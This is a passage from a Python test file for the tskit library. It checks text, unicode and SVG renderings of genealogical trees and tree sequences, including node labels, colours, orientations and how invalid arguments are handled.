"6┫ ┏━━2\n"
" ┃ ┃ \n"
" ┗5┫ ┏0\n"
" ┗4┫ \n"
" ┗3\n"
)
self.verify_text_rendering(t.draw_text(orientation="left", order="tree"), tree)
tree = (
"2.92┊ 6 ┊\n"
" ┊ ┏━┻━┓ ┊\n"
"1.49┊ ┃ 5 ┊\n"
" ┊ ┃ ┏━┻┓ ┊\n"
"0.27┊ ┃ ┃ 4 ┊\n"
" ┊ ┃ ┃ ┏┻┓ ┊\n"
"0.00┊ 1 2 0 3 ┊\n"
" 0.00 1.00\n"
)
self.verify_text_rendering(ts.draw_text(order="tree"), tree)
tree = (
" 6 \n"
"+-+-+ \n"
"| 5 \n"
"| +-++ \n"
"| | 4 \n"
"| | +++\n"
"1 2 0 3\n"
)
drawn = t.draw(format="ascii", order="tree")
self.verify_text_rendering(drawn, tree)
tree = (
" 6 \n"
"┏━┻━┓ \n"
"┃xxxxxxxxxx\n"
"┃ ┏━┻┓ \n"
"┃ ┃ 4 \n"
"┃ ┃ ┏┻┓ \n"
"1 2 0 3 \n"
)
labels = {u: str(u) for u in t.nodes()}
labels[5] = "xxxxxxxxxx"
drawn = t.draw_text(node_labels=labels, order="tree")
self.verify_text_rendering(drawn, tree)
tree = (
" ┏━━━━━━━━━━━━━1\n"
" ┃ \n"
"6┫ ┏━━2\n"
" ┃ ┃ \n"
" ┗xxxxxxxxxx┫ ┏0\n"
" ┗4┫ \n"
" ┗3\n"
)
drawn = t.draw_text(node_labels=labels, orientation="left", order="tree")
self.verify_text_rendering(drawn, tree)
tree = (
"2.92┊ 6 ┊\n"
" ┊ ┏━┻━┓ ┊\n"
"1.49┊ ┃xxxxxxxxxx ┊\n"
" ┊ ┃ ┏━┻┓ ┊\n"
"0.27┊ ┃ ┃ 4 ┊\n"
" ┊ ┃ ┃ ┏┻┓ ┊\n"
"0.00┊ 1 2 0 3 ┊\n"
" 0.00 1.00\n"
)
drawn = ts.draw_text(node_labels=labels, order="tree")
self.verify_text_rendering(drawn, tree)
def test_trident_tree(self):
nodes = io.StringIO(
"""\
id is_sample time
0 1 0
1 1 0
2 1 0
3 1 2
"""
)
edges = io.StringIO(
"""\
left right parent child
0 1 3 0
0 1 3 1
0 1 3 2
"""
)
tree = (
# fmt: off
" 3 \n"
"┏━╋━┓\n"
"0 1 2\n"
# fmt: on
)
ts = tskit.load_text(nodes, edges, strict=False)
t = next(ts.trees())
drawn = t.draw(format="unicode", order="tree")
self.verify_text_rendering(drawn, tree)
self.verify_text_rendering(t.draw_text(), tree)
tree = (
# fmt: off
" ┏0\n"
" ┃\n"
"3╋1\n"
" ┃\n"
" ┗2\n"
# fmt: on
)
drawn = t.draw_text(orientation="left")
self.verify_text_rendering(drawn, tree)
tree = (
# fmt: off
"0┓\n"
" ┃\n"
"1╋3\n"
" ┃\n"
"2┛\n"
# fmt: on
)
drawn = t.draw_text(orientation="right")
self.verify_text_rendering(drawn, tree)
def test_pitchfork_tree(self):
nodes = io.StringIO(
"""\
id is_sample time
0 1 0
1 1 0
2 1 0
3 1 0
4 1 2
"""
)
edges = io.StringIO(
"""\
left right parent child
0 1 4 0
0 1 4 1
0 1 4 2
0 1 4 3
"""
)
ts = tskit.load_text(nodes, edges, strict=False)
t = next(ts.trees())
tree = (
# fmt: off
" 4 \n"
"┏━┳┻┳━┓\n"
"0 1 2 3\n"
# fmt: on
)
drawn = t.draw(format="unicode", order="tree")
self.verify_text_rendering(drawn, tree)
self.verify_text_rendering(t.draw_text(), tree)
# No labels
tree = (
# fmt: off
" ┃ \n"
"┏━┳┻┳━┓\n"
"┃ ┃ ┃ ┃\n"
# fmt: on
)
drawn = t.draw(format="unicode", node_labels={}, order="tree")
self.verify_text_rendering(drawn, tree)
self.verify_text_rendering(t.draw_text(node_labels={}), tree)
# Some labels
tree = (
# fmt: off
" ┃ \n"
"┏━┳┻┳━┓\n"
"0 ┃ ┃ 3\n"
# fmt: on
)
labels = {0: "0", 3: "3"}
drawn = t.draw(format="unicode", node_labels=labels, order="tree")
self.verify_text_rendering(drawn, tree)
self.verify_text_rendering(t.draw_text(node_labels=labels), tree)
tree = (
# fmt: off
" ┏0\n"
" ┃\n"
" ┣1\n"
"4┫\n"
" ┣2\n"
" ┃\n"
" ┗3\n"
# fmt: on
)
drawn = t.draw_text(orientation="left")
self.verify_text_rendering(drawn, tree)
tree = (
# fmt: off
"0┓\n"
" ┃\n"
"1┫\n"
" ┣4\n"
"2┫\n"
" ┃\n"
"3┛\n"
# fmt: on
)
drawn = t.draw_text(orientation="right")
self.verify_text_rendering(drawn, tree)
    def test_stick_tree(self):
        """Text rendering of a degenerate "stick" tree (unary chain 2-1-0).

        Checks all four orientations; the horizontal orientations collapse
        to a single line joined with box-drawing dashes.
        """
        nodes = io.StringIO(
            """\
        id  is_sample   time
        0   1           0
        1   1           1
        2   1           2
        """
        )
        edges = io.StringIO(
            """\
        left    right   parent  child
        0       1       1       0
        0       1       2       1
        """
        )
        tree = (
            # fmt: off
            "2\n"
            "┃\n"
            "1\n"
            "┃\n"
            "0\n"
            # fmt: on
        )
        ts = tskit.load_text(nodes, edges, strict=False)
        t = next(ts.trees())
        drawn = t.draw(format="unicode", order="tree")
        self.verify_text_rendering(drawn, tree)
        self.verify_text_rendering(t.draw_text(), tree)
        # Bottom orientation flips the chain: leaf on top, root at the bottom.
        tree = (
            # fmt: off
            "0\n"
            "┃\n"
            "1\n"
            "┃\n"
            "2\n"
            # fmt: on
        )
        drawn = t.draw_text(orientation="bottom")
        self.verify_text_rendering(drawn, tree)
        tree = "2━1━0\n"
        drawn = t.draw_text(orientation="left")
        self.verify_text_rendering(drawn, tree)
        tree = "0━1━2\n"
        drawn = t.draw_text(orientation="right")
        self.verify_text_rendering(drawn, tree)
def test_draw_forky_tree(self):
tree = (
" 14 \n"
" ┏━━━━┻━━━━┓ \n"
" ┃ 13 \n"
" ┃ ┏━┳━┳━╋━┳━━┓ \n"
" ┃ ┃ ┃ ┃ ┃ ┃ 12 \n"
" ┃ ┃ ┃ ┃ ┃ ┃ ┏┻┓ \n"
" 11 ┃ ┃ ┃ ┃ ┃ ┃ ┃ \n"
"┏━┻┓ ┃ ┃ ┃ ┃ ┃ ┃ ┃ \n"
"┃ 10 ┃ ┃ ┃ ┃ ┃ ┃ ┃ \n"
"┃ ┏┻┓ ┃ ┃ ┃ ┃ ┃ ┃ ┃ \n"
"8 0 3 2 4 5 6 9 1 7 \n"
)
nodes = io.StringIO(
"""\
id is_sample population individual time metadata
0 1 0 -1 0.00000000000000
1 1 0 -1 0.00000000000000
2 1 0 -1 0.00000000000000
3 1 0 -1 0.00000000000000
4 1 0 -1 0.00000000000000
5 1 0 -1 0.00000000000000
6 1 0 -1 0.00000000000000
7 1 0 -1 0.00000000000000
8 1 0 -1 0.00000000000000
9 1 0 -1 0.00000000000000
10 0 0 -1 0.02398248117831
11 0 0 -1 0.17378680550869
12 0 0 -1 0.19950200178411
13 0 0 -1 0.20000000000000
14 0 0 -1 5.68339203134457
"""
)
edges = io.StringIO(
"""\
left right parent child
0.00000000 1.00000000 10 0
0.00000000 1.00000000 10 3
0.00000000 1.00000000 11 8
0.00000000 1.00000000 11 10
0.00000000 1.00000000 12 1
0.00000000 1.00000000 12 7
0.00000000 1.00000000 13 2
0.00000000 1.00000000 13 4
0.00000000 1.00000000 13 5
0.00000000 1.00000000 13 6
0.00000000 1.00000000 13 9
0.00000000 1.00000000 13 12
0.00000000 1.00000000 14 11
0.00000000 1.00000000 14 13
"""
)
ts = tskit.load_text(nodes, edges, strict=False)
t = next(ts.trees())
drawn = t.draw(format="unicode", order="tree")
self.verify_text_rendering(drawn, tree)
self.verify_text_rendering(t.draw_text(order="tree"), tree)
tree = (
" 14 \n"
" ┏━━━━━━┻━━━━━━┓ \n"
" ┃ 13 \n"
" ┃ ┏━┳━┳┻┳━┳━━┓ \n"
" ┃ ┃ ┃ ┃ ┃ ┃ 12 \n"
" ┃ ┃ ┃ ┃ ┃ ┃ ┏┻┓\n"
"x11xxxxxxx ┃ ┃ ┃ ┃ ┃ ┃ ┃\n"
"┏━┻┓ ┃ ┃ ┃ ┃ ┃ ┃ ┃\n"
"┃ 10 ┃ ┃ ┃ ┃ ┃ ┃ ┃\n"
"┃ ┏┻┓ ┃ ┃ ┃ ┃ ┃ ┃ ┃\n"
"8 0 3 2 4 5 6 9 1 7\n"
)
labels = {u: str(u) for u in t.nodes()}
labels[11] = "x11xxxxxxx"
self.verify_text_rendering(t.draw_text(node_labels=labels, order="tree"), tree)
tree = (
" 14 \n"
" ┏━━━━┻━━━━┓ \n"
" ┃ 13 \n"
" ┃ ┏━━┳━╋━┳━┳━┓\n"
" ┃ 12 ┃ ┃ ┃ ┃ ┃\n"
" ┃ ┏┻┓ ┃ ┃ ┃ ┃ ┃\n"
" 11 ┃ ┃ ┃ ┃ ┃ ┃ ┃\n"
" ┏┻━┓ ┃ ┃ ┃ ┃ ┃ ┃ ┃\n"
"10 ┃ ┃ ┃ ┃ ┃ ┃ ┃ ┃\n"
"┏┻┓ ┃ ┃ ┃ ┃ ┃ ┃ ┃ ┃\n"
"0 3 8 1 7 2 4 5 6 9\n"
)
self.verify_text_rendering(t.draw_text(order="minlex"), tree)
def test_draw_multiroot_forky_tree(self):
tree = (
" 13 \n"
"┏━┳━┳━╋━┳━━┓ \n"
"┃ ┃ ┃ ┃ ┃ 12 \n"
"┃ ┃ ┃ ┃ ┃ ┏┻┓ \n"
"┃ ┃ ┃ ┃ ┃ ┃ ┃ 11 \n"
"┃ ┃ ┃ ┃ ┃ ┃ ┃ ┏━┻┓ \n"
"┃ ┃ ┃ ┃ ┃ ┃ ┃ ┃ 10 \n"
"┃ ┃ ┃ ┃ ┃ ┃ ┃ ┃ ┏┻┓ \n"
"2 4 5 6 9 1 7 8 0 3 \n"
)
nodes = io.StringIO(
"""\
id is_sample population individual time metadata
0 1 0 -1 0.00000000000000
1 1 0 -1 0.00000000000000
2 1 0 -1 0.00000000000000
3 1 0 -1 0.00000000000000
4 1 0 -1 0.00000000000000
5 1 0 -1 0.00000000000000
6 1 0 -1 0.00000000000000
7 1 0 -1 0.00000000000000
8 1 0 -1 0.00000000000000
9 1 0 -1 0.00000000000000
10 0 0 -1 0.02398248117831
11 0 0 -1 0.17378680550869
12 0 0 -1 0.19950200178411
13 0 0 -1 0.20000000000000
14 0 0 -1 5.68339203134457
"""
)
edges = io.StringIO(
"""\
left right parent child
0.00000000 1.00000000 10 0
0.00000000 1.00000000 10 3
0.00000000 1.00000000 11 8
0.00000000 1.00000000 11 10
0.00000000 1.00000000 12 1
0.00000000 1.00000000 12 7
0.00000000 1.00000000 13 2
0.00000000 1.00000000 13 4
0.00000000 1.00000000 13 5
0.00000000 1.00000000 13 6
0.00000000 1.00000000 13 9
0.00000000 1.00000000 13 12
"""
)
ts = tskit.load_text(nodes, edges, strict=False)
t = next(ts.trees())
drawn = t.draw(format="unicode", order="tree")
self.verify_text_rendering(drawn, tree)
self.verify_text_rendering(t.draw_text(order="tree"), tree)
tree = (
" 13 \n"
" ┏━━┳━╋━┳━┳━┓\n"
" 12 ┃ ┃ ┃ ┃ ┃\n"
" ┏┻┓ ┃ ┃ ┃ ┃ ┃\n"
" 11 ┃ ┃ ┃ ┃ ┃ ┃ ┃\n"
" ┏┻━┓ ┃ ┃ ┃ ┃ ┃ ┃ ┃\n"
"10 ┃ ┃ ┃ ┃ ┃ ┃ ┃ ┃\n"
"┏┻┓ ┃ ┃ ┃ ┃ ┃ ┃ ┃ ┃\n"
"0 3 8 1 7 2 4 5 6 9\n"
)
drawn = t.draw(format="unicode")
self.verify_text_rendering(drawn, tree)
self.verify_text_rendering(t.draw_text(), tree)
self.verify_text_rendering(t.draw_text(order="minlex"), tree)
def test_simple_tree_sequence(self):
ts = self.get_simple_ts()
ts_drawing = (
"9.08┊ 9 ┊ ┊ ┊ ┊ ┊\n"
" ┊ ┏━┻━┓ ┊ ┊ ┊ ┊ ┊\n"
"3.57┊ ┃ ┃ ┊ ┊ ┊ ┊ 8 ┊\n"
" ┊ ┃ ┃ ┊ ┊ ┊ ┊ ┏━┻━┓ ┊\n"
"2.31┊ ┃ ┃ ┊ 7 ┊ ┊ 7 ┊ ┃ ┃ ┊\n"
" ┊ ┃ ┃ ┊ ┏━┻━┓ ┊ ┊ ┏━┻━┓ ┊ ┃ ┃ ┊\n"
"1.75┊ ┃ ┃ ┊ ┃ ┃ ┊ 6 ┊ ┃ ┃ ┊ ┃ ┃ ┊\n"
" ┊ ┃ ┃ ┊ ┃ ┃ ┊ ┏━┻━┓ ┊ ┃ ┃ ┊ ┃ ┃ ┊\n"
"0.11┊ ┃ 5 ┊ ┃ 5 ┊ ┃ 5 ┊ ┃ 5 ┊ ┃ 5 ┊\n"
" ┊ ┃ ┏┻┓ ┊ ┃ ┏┻┓ ┊ ┃ ┏┻┓ ┊ ┃ ┏┻┓ ┊ ┃ ┏┻┓ ┊\n"
"0.02┊ 4 ┃ ┃ ┊ 4 ┃ ┃ ┊ 4 ┃ ┃ ┊ 4 ┃ ┃ ┊ 4 ┃ ┃ ┊\n"
" ┊ ┏┻┓ ┃ ┃ ┊ ┏┻┓ ┃ ┃ ┊ ┏┻┓ ┃ ┃ ┊ ┏┻┓ ┃ ┃ ┊ ┏┻┓ ┃ ┃ ┊\n"
"0.00┊ 0 1 2 3 ┊ 0 1 2 3 ┊ 0 1 2 3 ┊ 0 1 2 3 ┊ 0 1 2 3 ┊\n"
" 0.00 0.06 0.79 0.91 0.91 1.00\n"
)
self.verify_text_rendering(ts.draw_text(), ts_drawing)
ts_drawing = (
"9.08| 9 | | | | |\n"
" | +-+-+ | | | | |\n"
"3.57| | | | | | | 8 |\n"
" | | | | | | | +-+-+ |\n"
"2.31| | | | 7 | | 7 | | | |\n"
" | | | | +-+-+ | | +-+-+ | | | |\n"
"1.75| | | | | | | 6 | | | | | | |\n"
" | | | | | | | +-+-+ | | | | | | |\n"
"0.11| | 5 | | 5 | | 5 | | 5 | | 5 |\n"
" | | +++ | | +++ | | +++ | | +++ | | +++ |\n"
"0.02| 4 | | | 4 | | | 4 | | | 4 | | | 4 | | |\n"
" | +++ | | | +++ | | | +++ | | | +++ | | | +++ | | |\n"
"0.00| 0 1 2 3 | 0 1 2 3 | 0 1 2 3 | 0 1 2 3 | 0 1 2 3 |\n"
" 0.00 0.06 0.79 0.91 0.91 1.00\n"
)
self.verify_text_rendering(ts.draw_text(use_ascii=True), ts_drawing)
ts_drawing = (
"┊ 9 ┊ ┊ ┊ ┊ ┊\n"
"┊ ┏━┻━┓ ┊ ┊ ┊ ┊ ┊\n"
"┊ ┃ ┃ ┊ ┊ ┊ ┊ 8 ┊\n"
"┊ ┃ ┃ ┊ ┊ ┊ ┊ ┏━┻━┓ ┊\n"
"┊ ┃ ┃ ┊ 7 ┊ ┊ 7 ┊ ┃ ┃ ┊\n"
"┊ ┃ ┃ ┊ ┏━┻━┓ ┊ ┊ ┏━┻━┓ ┊ ┃ ┃ ┊\n"
"┊ ┃ ┃ ┊ ┃ ┃ ┊ 6 ┊ ┃ ┃ ┊ ┃ ┃ ┊\n"
"┊ ┃ ┃ ┊ ┃ ┃ ┊ ┏━┻━┓ ┊ ┃ ┃ ┊ ┃ ┃ ┊\n"
"┊ ┃ 5 ┊ ┃ 5 ┊ ┃ 5 ┊ ┃ 5 ┊ ┃ 5 ┊\n"
"┊ ┃ ┏┻┓ ┊ ┃ ┏┻┓ ┊ ┃ ┏┻┓ ┊ ┃ ┏┻┓ ┊ ┃ ┏┻┓ ┊\n"
"┊ 4 ┃ ┃ ┊ 4 ┃ ┃ ┊ 4 ┃ ┃ ┊ 4 ┃ ┃ ┊ 4 ┃ ┃ ┊\n"
"┊ ┏┻┓ ┃ ┃ ┊ ┏┻┓ ┃ ┃ ┊ ┏┻┓ ┃ ┃ ┊ ┏┻┓ ┃ ┃ ┊ ┏┻┓ ┃ ┃ ┊\n"
"┊ 0 1 2 3 ┊ 0 1 2 3 ┊ 0 1 2 3 ┊ 0 1 2 3 ┊ 0 1 2 3 ┊\n"
"0.00 0.06 0.79 0.91 0.91 1.00\n"
)
self.verify_text_rendering(ts.draw_text(time_label_format=""), ts_drawing)
ts_drawing = (
"┊ 9 ┊ ┊ ┊ ┊ ┊\n"
"┊ ┏━┻━┓ ┊ ┊ ┊ ┊ ┊\n"
"┊ ┃ ┃ ┊ ┊ ┊ ┊ 8 ┊\n"
"┊ ┃ ┃ ┊ ┊ ┊ ┊ ┏━┻━┓ ┊\n"
"┊ ┃ ┃ ┊ 7 ┊ ┊ 7 ┊ ┃ ┃ ┊\n"
"┊ ┃ ┃ ┊ ┏━┻━┓ ┊ ┊ ┏━┻━┓ ┊ ┃ ┃ ┊\n"
"┊ ┃ ┃ ┊ ┃ ┃ ┊ 6 ┊ ┃ ┃ ┊ ┃ ┃ ┊\n"
"┊ ┃ ┃ ┊ ┃ ┃ ┊ ┏━┻━┓ ┊ ┃ ┃ ┊ ┃ ┃ ┊\n"
"┊ ┃ 5 ┊ ┃ 5 ┊ ┃ 5 ┊ ┃ 5 ┊ ┃ 5 ┊\n"
"┊ ┃ ┏┻┓ ┊ ┃ ┏┻┓ ┊ ┃ ┏┻┓ ┊ ┃ ┏┻┓ ┊ ┃ ┏┻┓ ┊\n"
"┊ 4 ┃ ┃ ┊ 4 ┃ ┃ ┊ 4 ┃ ┃ ┊ 4 ┃ ┃ ┊ 4 ┃ ┃ ┊\n"
"┊ ┏┻┓ ┃ ┃ ┊ ┏┻┓ ┃ ┃ ┊ ┏┻┓ ┃ ┃ ┊ ┏┻┓ ┃ ┃ ┊ ┏┻┓ ┃ ┃ ┊\n"
"┊ 0 1 2 3 ┊ 0 1 2 3 ┊ 0 1 2 3 ┊ 0 1 2 3 ┊ 0 1 2 3 ┊\n"
"┊ ┊ ┊ ┊ ┊ ┊\n"
)
self.verify_text_rendering(
ts.draw_text(time_label_format="", position_label_format=""), ts_drawing
)
def test_tree_sequence_non_minlex(self):
nodes = io.StringIO(
"""\
id is_sample time population individual metadata
0 1 0.000000 0 -1
1 1 0.000000 0 -1
2 1 0.000000 0 -1
3 1 0.000000 0 -1
4 1 0.000000 0 -1
5 0 1.174545 0 -1
6 0 1.207717 0 -1
7 0 1.276422 0 -1
8 0 1.613390 0 -1
9 0 2.700069 0 -1
"""
)
edges = io.StringIO(
"""\
left right parent child
0.000000 1.000000 5 0
0.000000 1.000000 5 1
0.000000 0.209330 6 4
0.000000 0.209330 6 5
0.000000 1.000000 7 2
0.209330 1.000000 7 5
0.000000 0.209330 7 6
0.209330 1.000000 8 3
0.209330 1.000000 8 4
0.000000 0.209330 9 3
0.000000 1.000000 9 7
0.209330 1.000000 9 8
"""
)
ts = tskit.load_text(nodes, edges, strict=False)
drawn_minlex = (
"2.70┊ 9 ┊ 9 ┊\n"
" ┊ ┏━┻━┓ ┊ ┏━┻━━┓ ┊\n"
"1.61┊ ┃ ┃ ┊ ┃ 8 ┊\n"
" ┊ ┃ ┃ ┊ ┃ ┏┻┓ ┊\n"
"1.28┊ 7 ┃ ┊ 7 ┃ ┃ ┊\n"
" ┊ ┏━┻━┓ ┃ ┊ ┏┻━┓ ┃ ┃ ┊\n"
"1.21┊ 6 ┃ ┃ ┊ ┃ ┃ ┃ ┃ ┊\n"
" ┊ ┏┻━┓ ┃ ┃ ┊ ┃ ┃ ┃ ┃ ┊\n"
"1.17┊ 5 ┃ ┃ ┃ ┊ 5 ┃ ┃ ┃ ┊\n"
" ┊ ┏┻┓ ┃ ┃ ┃ ┊ ┏┻┓ ┃ ┃ ┃ ┊\n"
"0.00┊ 0 1 4 2 3 ┊ 0 1 2 3 4 ┊\n"
" 0.00 0.21 1.00\n"
)
self.verify_text_rendering(ts.draw_text(order="minlex"), drawn_minlex)
self.verify_text_rendering(ts.draw_text(), drawn_minlex)
drawn_tree = (
"2.70┊ 9 ┊ 9 ┊\n"
" ┊ ┏━┻━┓ ┊ ┏━┻━━┓ ┊\n"
"1.61┊ ┃ ┃ ┊ ┃ 8 ┊\n"
" ┊ ┃ ┃ ┊ ┃ ┏┻┓ ┊\n"
"1.28┊ ┃ 7 ┊ 7 ┃ ┃ ┊\n"
" ┊ ┃ ┏━┻━┓ ┊ ┏━┻┓ ┃ ┃ ┊\n"
"1.21┊ ┃ ┃ 6 ┊ ┃ ┃ ┃ ┃ ┊\n"
" ┊ ┃ ┃ ┏━┻┓ ┊ ┃ ┃ ┃ ┃ ┊\n"
"1.17┊ ┃ ┃ ┃ 5 ┊ ┃ 5 ┃ ┃ ┊\n"
" ┊ ┃ ┃ ┃ ┏┻┓ ┊ ┃ ┏┻┓ ┃ ┃ ┊\n"
"0.00┊ 3 2 4 0 1 ┊ 2 0 1 3 4 ┊\n"
" 0.00 0.21 1.00\n"
)
self.verify_text_rendering(ts.draw_text(order="tree"), drawn_tree)
def test_max_tree_height(self):
ts = self.get_simple_ts()
tree = (
" 9 \n"
" ┏━┻━┓ \n"
" ┃ ┃ \n"
" ┃ ┃ \n"
" ┃ ┃ \n"
" ┃ ┃ \n"
" ┃ ┃ \n"
" ┃ ┃ \n"
" ┃ 5 \n"
" ┃ ┏┻┓\n"
" 4 ┃ ┃\n"
"┏┻┓ ┃ ┃\n"
"0 1 2 3\n"
)
t = ts.first()
self.verify_text_rendering(t.draw_text(max_tree_height="ts"), tree)
tree = (
" 9 \n"
" ┏━┻━┓ \n"
" ┃ 5 \n"
" ┃ ┏┻┓\n"
" 4 ┃ ┃\n"
"┏┻┓ ┃ ┃\n"
"0 1 2 3\n"
)
t = ts.first()
self.verify_text_rendering(t.draw_text(max_tree_height="tree"), tree)
for bad_max_tree_height in [1, "sdfr", ""]:
with pytest.raises(ValueError):
t.draw_text(max_tree_height=bad_max_tree_height)
class TestDrawSvg(TestTreeDraw, xmlunittest.XmlTestCase):
"""
Tests the SVG tree drawing.
"""
def verify_basic_svg(self, svg, width=200, height=200):
prefix = "{http://www.w3.org/2000/svg}"
root = xml.etree.ElementTree.fromstring(svg)
assert root.tag == prefix + "svg"
assert width == int(root.attrib["width"])
assert height == int(root.attrib["height"])
# Verify the class structure of the svg
root_group = root.find(prefix + "g")
assert "class" in root_group.attrib
assert re.search(r"\b(tree|tree-sequence)\b", root_group.attrib["class"])
if "tree-sequence" in root_group.attrib["class"]:
trees = None
for g in root_group.findall(prefix + "g"):
if "trees" in g.attrib.get("class", ""):
trees = g
break
assert trees is not None # Must have found a trees group
first_treebox = trees.find(prefix + "g")
assert "class" in first_treebox.attrib
assert re.search(r"\btreebox\b", first_treebox.attrib["class"])
first_tree = first_treebox.find(prefix + "g")
assert "class" in first_tree.attrib
assert re.search(r"\btree\b", first_tree.attrib["class"])
else:
first_tree = root_group
# Check that we have edges, symbols, and labels groups
groups = first_tree.findall(prefix + "g")
assert len(groups) > 0
for group in groups:
assert "class" in group.attrib
cls = group.attrib["class"]
assert re.search(r"\broot\b", cls)
def test_draw_file(self):
t = self.get_binary_tree()
fd, filename = tempfile.mkstemp(prefix="tskit_viz_")
try:
os.close(fd)
svg = t.draw(path=filename)
assert os.path.getsize(filename) > 0
with open(filename) as tmp:
other_svg = tmp.read()
assert svg == other_svg
os.unlink(filename)
svg = t.draw_svg(path=filename)
assert os.path.getsize(filename) > 0
with open(filename) as tmp:
other_svg = tmp.read()
self.verify_basic_svg(svg)
self.verify_basic_svg(other_svg)
ts = t.tree_sequence
svg = ts.draw_svg(path=filename)
assert os.path.getsize(filename) > 0
with open(filename) as tmp:
other_svg = tmp.read()
self.verify_basic_svg(svg)
self.verify_basic_svg(other_svg)
finally:
os.unlink(filename)
def test_draw_defaults(self):
t = self.get_binary_tree()
svg = t.draw()
self.verify_basic_svg(svg)
svg = t.draw_svg()
self.verify_basic_svg(svg)
def test_draw_nonbinary(self):
t = self.get_nonbinary_tree()
svg = t.draw()
self.verify_basic_svg(svg)
svg = t.draw_svg()
self.verify_basic_svg(svg)
def test_draw_multiroot(self):
t = self.get_multiroot_tree()
svg = t.draw()
self.verify_basic_svg(svg)
svg = t.draw_svg()
self.verify_basic_svg(svg)
def test_draw_mutations_over_roots(self):
t = self.get_mutations_over_roots_tree()
svg = t.draw()
self.verify_basic_svg(svg)
svg = t.draw_svg()
self.verify_basic_svg(svg)
def test_draw_unary(self):
t = self.get_unary_node_tree()
svg = t.draw()
self.verify_basic_svg(svg)
svg = t.draw_svg()
self.verify_basic_svg(svg)
def test_draw_empty(self):
t = self.get_empty_tree()
with pytest.raises(ValueError):
t.draw()
with pytest.raises(ValueError):
t.draw_svg()
def test_draw_zero_roots(self):
t = self.get_zero_roots_tree()
with pytest.raises(ValueError):
t.draw()
with pytest.raises(ValueError):
t.draw_svg()
def test_draw_zero_edge(self):
t = self.get_zero_edge_tree()
svg = t.draw()
self.verify_basic_svg(svg)
svg = t.draw_svg()
self.verify_basic_svg(svg)
def test_width_height(self):
t = self.get_binary_tree()
w = 123
h = 456
svg = t.draw(width=w, height=h)
self.verify_basic_svg(svg, w, h)
svg = t.draw_svg(size=(w, h))
self.verify_basic_svg(svg, w, h)
def test_node_labels(self):
t = self.get_binary_tree()
labels = {u: "XXX" for u in t.nodes()}
svg = t.draw(format="svg", node_labels=labels)
self.verify_basic_svg(svg)
assert svg.count("XXX") == t.num_nodes
svg = t.draw_svg(node_label_attrs={u: {"text": labels[u]} for u in t.nodes()})
self.verify_basic_svg(svg)
assert svg.count("XXX") == t.num_nodes
def test_one_node_label(self):
t = self.get_binary_tree()
labels = {0: "XXX"}
svg = t.draw(format="svg", node_labels=labels)
self.verify_basic_svg(svg)
assert svg.count("XXX") == 1
svg = t.draw_svg(node_label_attrs={0: {"text": "XXX"}})
self.verify_basic_svg(svg)
assert svg.count("XXX") == 1
def test_no_node_labels(self):
t = self.get_binary_tree()
labels = {}
svg = t.draw(format="svg", node_labels=labels)
self.verify_basic_svg(svg)
# Can't really test for much here if we don't understand the SVG
def test_one_node_colour(self):
t = self.get_binary_tree()
colour = "rgb(0, 1, 2)"
colours = {0: colour}
svg = t.draw(format="svg", node_colours=colours)
self.verify_basic_svg(svg)
assert svg.count(f"fill:{colour}") == 1
svg = t.draw_svg(node_attrs={0: {"fill": colour}})
self.verify_basic_svg(svg)
assert svg.count(f'fill="{colour}"') == 1
def test_all_nodes_colour(self):
t = self.get_binary_tree()
colours = {u: f"rgb({u}, {u}, {u})" for u in t.nodes()}
svg = t.draw(format="svg", node_colours=colours)
self.verify_basic_svg(svg)
for colour in colours.values():
assert svg.count(f"fill:{colour}") == 1
svg = t.draw_svg(node_attrs={u: {"fill": colours[u]} for u in t.nodes()})
self.verify_basic_svg(svg)
assert svg.count(f'fill="{colour}"') == 1
for colour in colours.values():
assert svg.count(f'fill="{colour}"') == 1
def test_unplotted_node(self):
t = self.get_binary_tree()
colour = None
colours = {0: colour}
svg = t.draw(format="svg", node_colours=colours)
assert svg.count("opacity:0") == 1
def test_one_edge_colour(self):
t = self.get_binary_tree()
colour = "rgb(0, 1, 2)"
colours = {0: colour}
svg = t.draw(format="svg", edge_colours=colours)
self.verify_basic_svg(svg)
assert svg.count(f"stroke:{colour}") > 0
svg = t.draw_svg(edge_attrs={0: {"stroke": colour}})
self.verify_basic_svg(svg)
assert svg.count(f'stroke="{colour}"') == 1
def test_one_mutation_label_colour(self):
t = self.get_binary_tree()
colour = "rgb(0, 1, 2)"
svg = t.draw_svg(mutation_label_attrs={0: {"stroke": colour}})
self.verify_basic_svg(svg)
assert svg.count(f'stroke="{colour}"') == 1
def test_bad_tree_height_scale(self):
t = self.get_binary_tree()
for bad_scale in ["te", "asdf", "", [], b"23"]:
with pytest.raises(ValueError):
t.draw_svg(tree_height_scale=bad_scale)
def test_bad_max_tree_height(self):
t = self.get_binary_tree()
for bad_height in ["te", "asdf", "", [], b"23"]:
with pytest.raises(ValueError):
t.draw_svg(max_tree_height=bad_height)
def test_height_scale_time_and_max_tree_height(self):
ts = msprime.simulate(5, recombination_rate=2, random_seed=2)
t = ts.first()
# The default should be the same as tree.
svg1 = t.draw_svg(max_tree_height="tree")
self.verify_basic_svg(svg1)
svg2 = t.draw_svg()
assert svg1 == svg2
svg3 = t.draw_svg(max_tree_height="ts")
assert svg1 != svg3
svg4 = t.draw_svg(max_tree_height=max(ts.tables.nodes.time))
assert svg3 == svg4
def test_height_scale_rank_and_max_tree_height(self):
# Make sure the rank height scale and max_tree_height interact properly.
ts = msprime.simulate(5, recombination_rate=2, random_seed=2)
t = ts.first()
# The default should be the same as tree.
svg1 = t.draw_svg(max_tree_height="tree", tree_height_scale="rank")
self.verify_basic_svg(svg1)
svg2 = t.draw_svg(tree_height_scale="rank")
assert svg1 == svg2
svg3 = t.draw_svg(max_tree_height="ts", tree_height_scale="rank")
assert svg1 != svg3
self.verify_basic_svg(svg3)
# Numeric max tree height not supported for rank scale.
with pytest.raises(ValueError):
t.draw_svg(max_tree_height=2, tree_height_scale="rank")
#
# TODO: update the tests below here to check the new SVG based interface.
#
def test_all_edges_colour(self):
t = self.get_binary_tree()
colours = {u: "rgb({u},255,{u})".format(u=u) for u in t.nodes() if u != t.root}
svg = t.draw(format="svg", edge_colours=colours)
self.verify_basic_svg(svg)
for colour in colours.values():
assert svg.count(f"stroke:{colour}") > 0
def test_unplotted_edge(self):
t = self.get_binary_tree()
colour = None
colours = {0: colour}
svg = t.draw(format="svg", edge_colours=colours)
self.verify_basic_svg(svg)
assert svg.count("opacity:0") == 1
def test_mutation_labels(self):
t = self.get_binary_tree()
labels = {u.id: "XXX" for u in t.mutations()}
svg = t.draw(format="svg", mutation_labels=labels)
self.verify_basic_svg(svg)
assert svg.count("XXX") == t.num_mutations
def test_one_mutation_label(self):
t = self.get_binary_tree()
